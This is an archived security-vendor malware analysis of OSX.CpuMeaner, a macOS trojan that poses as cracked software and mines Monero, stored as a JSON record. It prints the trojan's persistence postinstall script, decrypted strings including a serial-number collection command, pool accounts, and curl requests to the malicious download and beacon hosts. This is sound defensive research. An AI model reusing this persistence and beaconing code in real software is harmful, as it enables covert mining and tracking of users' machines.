{
	"id": "89529eb3-b686-48c2-b6ac-b55787577f3b",
	"created_at": "2026-04-06T00:15:02.670285Z",
	"updated_at": "2026-04-10T03:20:42.53812Z",
	"deleted_at": null,
	"sha1_hash": "2bd6a12475b16af3d0d04441fcf1d56d96ab774e",
	"title": "OSX.CpuMeaner: New Crypto Mining Trojan Targets macOS",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1474429,
	"plain_text": "OSX.CpuMeaner: New Crypto Mining Trojan Targets macOS\r\nBy Arnaud Abbati\r\nPublished: 2017-11-28 · Archived: 2026-04-05 21:24:48 UTC\r\n(Image source: Beware of traps, by Carmen)\r\nIn this post, we analyze a new cryptocurrency mining trojan targeting macOS. The malware hides in the pledge to\r\ndownload pirated applications and secretly mines Monero crypto-currency with the user’s hardware.\r\nWhile the idea is similar to OSX.Pwnet, the means and method of implementation are closer to that of the adware\r\nindustry.\r\nInfection\r\nIndividuals using pirated software could end up with malware from a variety of sources including a simple\r\nGoogle search and a YouTube video with a malicious link in its description. In the middle of technical support\r\nscams, fake Flash players, and recommended virus scans, the victim could end up with a malicious package. The\r\ninstance below shows a user looking for a crack of Sketch app:\r\n$ curl -svJO http://jumpcash.xyz/download.php -G -d e=pkg -d tag=mosx3 -d clickid=2305343 -d key=\"Ske\r\n* Trying 46.30.45.236...\r\n* Connected to jumpcash.xyz (46.30.45.236) port 80 (#0)\r\n\u003e GET /download.php?e=pkg\u0026tag=mosx3\u0026clickid=2305343\u0026key=Sketch 47 Crack HTTP/1.1\r\nhttps://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/\r\nPage 1 of 11\n\n\u003e Host: jumpcash.xyz\r\n\u003e User-Agent: curl/7.43.0\r\n\u003e Accept: */*\r\n\u003e\r\n\u003c HTTP/1.1 200 OK\r\n\u003c Server: nginx/1.4.6 (Ubuntu)\r\n\u003c Date: Tue, 14 Nov 2017 10:19:17 GMT\r\n\u003c Content-Type: application/octet-stream\r\n\u003c Content-Length: 169267\r\n\u003c Connection: keep-alive\r\n\u003c X-Powered-By: PHP/5.5.9-1ubuntu4.21\r\n\u003c Content-Description: File Transfer\r\n\u003c Content-Disposition: attachment; filename=Sketch_47_Crack-2305343-823868397374412531.pkg\r\n\u003c Content-Transfer-Encoding: binary\r\n\u003c Expires: 0\r\n\u003c Cache-Control: must-revalidate\r\n\u003c Pragma: public\r\n\u003c\r\n{ [936 bytes data]\r\n* Connection #0 to host jumpcash.xyz left intact\r\n$ shasum -a 256 Sketch_47_Crack-2305343-823868397374412531.pkg\r\n7a6cc593a8fb2853b817013e28681fa1698fd59d0cea69ba06b7a4b6dc3d5c80 Sketch_47_Crack-2305343-82386839737\r\nThe destination filename is generated using the  key  and the  clickid  queries. Of course, the downloaded\r\npackage doesn’t contain any pirated software:\r\nhttps://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/\r\nPage 2 of 11\n\nThe threat was also spotted on a French fake torrent site:\r\nA few users complained about installed executables, xmemapp and cpucooler, on Apple forums. According\r\nto VirusTotal, the threat is in the wild, with a detection ratio of 0, since the second half of September 2017.\r\nPackage analysis\r\nAt the time of writing, 3 packages were available on the server:\r\n$ for tag in mosx{1,2,3} ; do curl -s -o $tag.pkg http://jumpcash.xyz/download.php -G -d e=pkg -d tag\r\n$ shasum -a 256 mosx*.pkg\r\nd15a51bb1a88a8906a997a0d4c0d3fb35ddd64b722af23120600eeea989ecef9 mosx1.pkg\r\nc3c0da504e40359ce8247b912cbff00cbd32a2222cb53a6bd30f2e44f7781049 mosx2.pkg\r\n7a6cc593a8fb2853b817013e28681fa1698fd59d0cea69ba06b7a4b6dc3d5c80 mosx3.pkg\r\nThey are all signed using the same developer identity certificate:\r\n$ ls mosx*.pkg | xargs -L 1 pkgutil --check-signature | awk '/Developer ID Installer/'\r\n 1. Developer ID Installer: Artur Nurgaliev (DEWCRD3789)\r\n 1. Developer ID Installer: Artur Nurgaliev (DEWCRD3789)\r\n 1. Developer ID Installer: Artur Nurgaliev (DEWCRD3789)\r\nApple revoked the certificate on November 10, 2017:\r\nhttps://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/\r\nPage 3 of 11\n\n$ ls mosx*.pkg | xargs -L 1 spctl --assess -v --type install\r\nmosx1.pkg: CSSMERR_TP_CERT_REVOKED\r\nmosx2.pkg: CSSMERR_TP_CERT_REVOKED\r\nmosx3.pkg: CSSMERR_TP_CERT_REVOKED\r\nPackage tagged mosx1 drops  xmemapp , while packages tagged mosx2 or mosx3 drop  cpucooler :\r\n$ for pkg in mosx*.pkg ; do echo $pkg: $(pkgutil --payload-files $pkg | egrep -v -e ^\\.$) ; done\r\nmosx1.pkg: ./xmemapp\r\nmosx2.pkg: ./cpucooler\r\nmosx3.pkg: ./cpucooler\r\nPayload executables don’t have the same hash:\r\n$ for tag in mosx{1,2,3} ; do pkgutil --expand $tag.pkg $tag \u0026\u0026 tar xf $tag/Payload -C $tag ; done\r\n$ shasum -a 256 mosx*/{x,c}*\r\nd196aba4d59b132fc9cd6f6ba627166a8eb6631017636b0ed4df7fd0260524a5 mosx1/xmemapp\r\n47e523a8b796c27b6c0fe91a4781aa7b47c8d66ddb75117d3f3283a6079ff128 mosx2/cpucooler\r\n5c41ab1d3aaa33e021eb73c1a58894df8e679366d2f03663b8f1029a0dc80f26 mosx3/cpucooler\r\nThey are not code-signed:\r\n$ ls mosx*/{x,c}* | xargs -L 1 codesign -dvvv\r\nmosx1/xmemapp: code object is not signed at all\r\nmosx2/cpucooler: code object is not signed at all\r\nmosx3/cpucooler: code object is not signed at all\r\nThey are installed to different locations:\r\n$ for tag in mosx{1,2,3}; do echo $tag: $(xmllint --xpath \"string(//pkg-info/@install-location)\" $tag\r\nmosx1: /Library/Application Support/XMemApp\r\nmosx2: /Library/Application Support/CpuCooler\r\nmosx3: /Library/Application Support/CpuCooler\r\nAfter installation, the package runs its  postinstall  script to:\r\nwrite the launchd.plist file to  /Library/LaunchAgents  for persistence;\r\nload the Launch Agent;\r\nwait 10 seconds and kill all processes with the executable name;\r\nwait 60 seconds in the background and run the executable, with the package name as an argument.\r\nThis is the  postinstall  script for mosx2 and mosx3 packages:\r\nhttps://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/\r\nPage 4 of 11\n\n#!/bin/bash\nIDENTIFIER=\"com.osxext.cpucooler\"\nINSTALL_LOCATION=\"/Library/Application Support/CpuCooler/cpucooler\"\nLAUNCH_AGENT_PLIST=\"/Library/LaunchAgents/$IDENTIFIER.plist\"\necho '?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\nUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\nLabel'$IDENTIFIER'Program'$INSTALL_LOCATION'RunAtLoad' \u003e \"$LAUNCH_AGENT_PLIST\"\nFILENAME=$(basename \"$1\")\n/bin/launchctl load \"$LAUNCH_AGENT_PLIST\"\nsleep 10 \u0026\u0026 sudo pkill cpucooler\nsleep 60 \u0026\u0026 /Library/Application\\ Support/CpuCooler/cpucooler \"$FILENAME\" \u0026\nexit\nExecutable analysis\nxmemapp and cpucooler are custom builds of XMRig version 2.3.1, an open-source Monero CPU miner.\nThe author added functions to de-obfuscate some strings and send feedback to a server:\nPostback::sendPostback(std::string const\u0026);\nUtils::Utils();\nUtils::encdec(std::string);\nUtils::exec(std::string const\u0026);\nUtils::getNumber();\nUtils::hex_to_string(std::string const\u0026);\nUtils::jenkins_one_at_a_time_hash(std::string, unsigned long);\nUtils::str_replace(std::string, std::string const\u0026, std::string const\u0026);\nUtils::~Utils();\nDefault arguments are also set from the main() function. The hard-coded options are:\nURL of mining server -o ;\nusername for mining server -u ;\nhttps://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/\nPage 5 of 11\n\npassword for mining server  -p x ;\r\nsafe adjust threads and av settings for current CPU  --safe ;\r\nnumber of miner threads  -t 2 .\r\nUtils::encdec()  decodes hexadecimal strings using  Utils::hex_to_string()  and decrypts the result with a\r\nXOR  0x4e :\r\n$ strings mosx3/cpucooler | egrep -e ^[[:xdigit:]]+$ -m 5\r\n27213c2b296e633c2a7f6e63397e6e632d6e0f3e3e222b0f060d070a273d250a3c27382b3c6e326e2f39256e69611d2b3c272\r\n243b233e2d2f3d2660363734\r\n23213d367d\r\n3d3a3c2f3a3b23653a2d3e74616136233c603e212122602327202b3c292f3a2b602d2123747a7b7b787e\r\n232f3c3a27202439262b2b3a0e232f2722602d2123\r\n$ ../decrypt_strings.py mosx1/xmemapp mosx{2,3}/cpucooler\r\nDecrypted strings for: mosx1/xmemapp\r\nioreg -rd1 -w0 -c AppleAHCIDiskDriver | awk '/Serial Number/{gsub(\"\\\"\", \"\", $4);print $4}'\r\njumpcash.xyz\r\nmosx1\r\nstratum+tcp:\r\njeffguyen@mail.com\r\nDecrypted strings for: mosx2/cpucooler\r\nioreg -rd1 -w0 -c AppleAHCIDiskDriver | awk '/Serial Number/{gsub(\"\\\"\", \"\", $4);print $4}'\r\njumpcash.xyz\r\nmosx2\r\nstratum+tcp:\r\njeffguyen@mail.com\r\nDecrypted strings for: mosx3/cpucooler\r\nioreg -rd1 -w0 -c AppleAHCIDiskDriver | awk '/Serial Number/{gsub(\"\\\"\", \"\", $4);print $4}'\r\njumpcash.xyz\r\nmosx3\r\nstratum+tcp:\r\nmartinjwheet@mail.com\r\nThese binaries use 2 threads (i.e. 200% of CPU) to mine on MinerGate XMR\r\npool for  jeffguyen@mail.com  (mosx1, mosx2) and  martinjwheet@mail.com  (mosx3) accounts.\r\nWhen executed with real arguments (i.e. by the package  postinstall  script),  main()  looks for a  -  and\r\na  .  in the first argument (the package name) and, when found, calls the  Postback::sendPostback()  function\r\nwith the substring as a parameter.\r\nPostback::sendPostback()  sends installation data to the decrypted domain name, notably\r\nusing  Utils::getNumber() :\r\n$ curl -A MNR -w \"%{http_code}\" http://jumpcash.xyz/pb.php -G -d t=mosx3 -d mid=2162179746 -d i=23053\r\nhttps://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/\r\nPage 6 of 11\n\n200\r\nUtils::getNumber()  runs the decrypted  ioreg  command with  Utils::exec() . The output is hashed\r\nusing Jenkins’s one-at-a-time hash and converted to a decimal representation to be included in the request’s\r\narguments.\r\nUtils::str_replace()  and, ironically,  Utils::jenkins_one_at_a_time_hash()  functions are not used (dead\r\ncode).\r\nMNR2 variants\r\nAfter  jumpcash.xyz domain was taken down, it didn’t take long for more variants to appear on other websites.\r\n$ for tag in mosx{2,3,np} ; do curl -s -o $tag.pkg http://storekit.xyz/api/v1/download.php -G -d e=pk\r\n$ shasum -a 256 *.pkg\r\nb6cbc89d0b5a8938c74c1f601a2b7a88b4a3391bf808d2c028885003a16d9b5a mosx2.pkg\r\nf1da940d6f417ef0001595ed816889ecdcacb41a3d6c921b6e039dc30e35ab8a mosx3.pkg\r\n6e0ec2d6754138b5971f417176136a7becfd75359919a8a5a3b4233aeaade9b3 mosxnp.pkg\r\nThe packages use another, soon to be revoked, developer identity:\r\n$ ls mosx*.pkg | xargs -L 1 pkgutil --check-signature | awk '/Developer ID Installer/'\r\n 1. Developer ID Installer: Adam Kortney (9ADZ437492)\r\n 1. Developer ID Installer: Adam Kortney (9ADZ437492)\r\nhttps://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/\r\nPage 7 of 11\n\n1. Developer ID Installer: Adam Kortney (9ADZ437492)\r\n$ ls mosx*.pkg | xargs -L 1 spctl --assess -v --type install\r\nmosx2.pkg: accepted\r\nsource=Developer ID\r\nmosx3.pkg: accepted\r\nsource=Developer ID\r\nmosxnp.pkg: accepted\r\nsource=Developer ID\r\nAgain, Apple revoked the certificate on November 22, 2017:\r\nInstalled executables have new names and locations:\r\n$ for pkg in mosx*.pkg ; do echo $pkg: $(pkgutil --payload-files $pkg | egrep -v -e ^\\.$) ; done\r\nmosx2.pkg: ./mxcpu\r\nmosx3.pkg: ./mxzcpu\r\nmosxnp.pkg: ./moszcpu\r\n$ for tag in mosx{2,3,np} ; do pkgutil --expand $tag.pkg $tag \u0026\u0026 tar xf $tag/Payload -C $tag ; done\r\n$ shasum -a 256 mosx*/m*cpu\r\n91b929d2470e3507b5faf5f12adb35046d96777e8b55b28b8e859a30924168b2 mosx2/mxcpu\r\nb636b2cc15925e68c200449d5d78a9e169af379e4e3b007075ded00d777ffdc7 mosx3/mxzcpu\r\n9a8b16f0a44cd63bf525142519b23481d4dcfd84d2dae02a0b0b9cb5caf1c147 mosxnp/moszcpu\r\n$ for tag in mosx{2,3,np}; do echo $tag: $(xmllint --xpath \"string(//pkg-info/@install-location)\" $ta\r\nmosx2: /Library/Application Support/mxcpu\r\nmosx3: /Library/Application Support/mxzcpu\r\nmosxnp: /Library/Application Support/moszcpu\r\nPackages now have a preinstall script to exit with an error code if the machine is already infected by an older\r\nvariant.\r\nHere is the new  postinstall  script workflow:\r\nwrite the launchd.plist file to  /Library/LaunchAgents  for persistence;\r\nexit if the machine is already trojanized;\r\nhttps://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/\r\nPage 8 of 11\n\nwrite the package name to  /Library/Application Support/mosxnp/info  file;\r\nload and start the Launch Agent;\r\nwait 5 seconds and check if the executable is running;\r\nif not, wait 30 seconds in the background and run the executable, with the package name as an argument;\r\nsend an installation status request to the server.\r\nThe new executables are now based on XMRig version 2.4.2. Custom functions are similar.  main()  now reads\r\nthe package name from  /Library/Application Support/mosxnp/info  file.\r\nThey are built for macOS Sierra or higher (10.12+), and crash on lower system versions:\r\n$ uname -v\r\nDarwin Kernel Version 15.6.0: Mon Aug 29 20:21:34 PDT 2016; root:xnu-3248.60.11~1/RELEASE_X86_64\r\n$ ./mxzcpu\r\ndyld: lazy symbol binding failed: Symbol not found: _clock_gettime\r\n Referenced from: /Library/Application Support/mxzcpu/./mxzcpu (which was built for Mac OS X 10.12)\r\n Expected in: /usr/lib/libSystem.B.dylib\r\ndyld: Symbol not found: _clock_gettime\r\n Referenced from: /Library/Application Support/mxzcpu/./mxzcpu (which was built for Mac OS X 10.12)\r\n Expected in: /usr/lib/libSystem.B.dylib\r\nTrace/BPT trap: 5\r\nThis can make sense, as macOS Sierra requires SSE4 enabled processors, and mining is much faster with this\r\ninstruction set.\r\nHere are the decrypted strings:\r\n$ ../decrypt_strings.py mosx*/m*cpu\r\nDecrypted strings for: mosx2/mxcpu\r\nstorekit.xyz\r\nmosx2\r\nioreg -rd1 -w0 -c AppleAHCIDiskDriver | awk '/Serial Number/{gsub(\"\\\"\", \"\", $4);print $4}'\r\n/Library/Application Support/mxcpu/info\r\nstratum+tcp:\r\njeffguyen@mail.com\r\nDecrypted strings for: mosx3/mxzcpu\r\nstorekit.xyz\r\nmosx3\r\nioreg -rd1 -w0 -c AppleAHCIDiskDriver | awk '/Serial Number/{gsub(\"\\\"\", \"\", $4);print $4}'\r\n/Library/Application Support/mxzcpu/info\r\nstratum+tcp:\r\nmartinjwheet@mail.com\r\nDecrypted strings for: mosxnp/moszcpu\r\nhttps://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/\r\nPage 9 of 11\n\nstorekit.xyz\r\nmosxnp\r\nioreg -rd1 -w0 -c AppleAHCIDiskDriver | awk '/Serial Number/{gsub(\"\\\"\", \"\", $4);print $4}'\r\n/Library/Application Support/moszcpu/info\r\nstratum+tcp:\r\n49dP6YfhFHmLWb16jESv8V977cYzbx8zCXz6A7gUh1sn65jQ1eQgUpG9qCs2mfNhVW9Jm86RQpDGTHxokFnutubU6HQCeuN.34c5c\r\nThe variant tagged mosxnp mines on Nanopool XMR pool.\r\nPostback::sendPostback()  now sends installation data to the URI  /api/v1/pb.php  on the\r\nhost  storekit.xyz  with the User-Agent  MNR2 .\r\nVirusTotal samples\r\nIn mid-November 2017, a couple of packages, tagged mosx3 and mosxnp, reached VirusTotal.\r\nTheir executables,  cpulite  and  mosxnp , are MNR2 variants, but the postinstall script is slightly different.\r\nXMRig dependencies, libuv and libmicrohttpd, are not linked statically: symbols are imported. As the dynamic\r\nlibraries are very likely to be missing on a target machine (Homebrew path), these executables crash at launch:\r\n$ otool -L mosxnp\r\nmosxnp:\r\n /usr/local/opt/libuv/lib/libuv.1.dylib (compatibility version 2.0.0, current version 2.0.0)\r\n /usr/local/opt/libmicrohttpd/lib/libmicrohttpd.12.dylib (compatibility version 56.0.0, current ve\r\n /usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 307.4.0)\r\n /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1238.0.0)\r\n$ ./mosxnp\r\ndyld: Library not loaded: /usr/local/opt/libuv/lib/libuv.1.dylib\r\n Referenced from: /Library/Application Support/mosxnp/./mosxnp\r\n Reason: image not found\r\nAbort trap: 6\r\nConclusion\r\nThis OSX.CpuMeaner is part of a larger trend of a new class of attacks as secret crypto mining attacks have\r\npopped up on Android, PC, Linux servers, and even Chrome with CoinHive miners. The fact is, criminals are\r\nalways looking for ways to monetize infections and although Crypto-mining malware isn’t a traditional attack\r\nsuch as exfiltrating passwords and other sensitive data, remotely controlling the device, etc., the incentive is high\r\nand all you need is a little CPU alongside some innocent looking network communication.\r\nIt is not 100% certain if these attacks will always be viable, but as long as the market continues to explode and\r\npeople are seeing massive ROI for coins like Monero, DASH, etc., we will continue to see these attacks crop up.\r\nhttps://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/\r\nPage 10 of 11\n\nSource: https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/\r\nhttps://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/\r\nPage 11 of 11\n\n* Trying * Connected 46.30.45.236... to jumpcash.xyz (46.30.45.236) port 80 (#0)  \n\u003e GET /download.php?e=pkg\u0026tag=mosx3\u0026clickid=2305343\u0026key=Sketch  47 Crack HTTP/1.1\n Page 1 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/"
	],
	"report_names": [
		"osx-cpumeaner-miner-trojan-software-pirates"
	],
	"threat_actors": [],
	"ts_created_at": 1775434502,
	"ts_updated_at": 1775791242,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2bd6a12475b16af3d0d04441fcf1d56d96ab774e.pdf",
		"text": "https://archive.orkl.eu/2bd6a12475b16af3d0d04441fcf1d56d96ab774e.txt",
		"img": "https://archive.orkl.eu/2bd6a12475b16af3d0d04441fcf1d56d96ab774e.jpg"
	}
}